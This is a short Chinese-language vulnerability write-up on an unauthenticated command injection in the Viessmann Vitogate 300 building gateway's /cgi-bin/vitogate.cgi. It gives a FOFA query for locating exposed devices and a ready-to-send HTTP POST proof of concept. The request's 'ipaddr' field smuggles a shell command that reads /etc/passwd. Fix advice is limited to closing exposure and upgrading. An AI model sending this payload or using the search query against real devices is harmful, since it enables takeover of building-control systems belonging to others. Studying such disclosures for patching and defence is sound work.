0x01 产品简介

Viessmann Vitogate 300是用于将Viessmann LON连接到BACnet或Modbus的网关。

0x02 漏洞概述

Vitogate 300 组件/cgi-bin/vitogate.cgi中的一个问题允许未经身份验证的攻击者绕过身份验证，通过特制的请求执行任意命令，可导致服务器失陷。

0x03 影响范围

version <= 2.1.3.0

0x04 复现环境

FOFA：app="Vitogate-300"

0x05 漏洞复现

PoC

POST /cgi-bin/vitogate.cgi HTTP/1.1
Host: your-ip
Content-Type: application/json{"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"1;cat /etc/passwd"}}

0x06 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本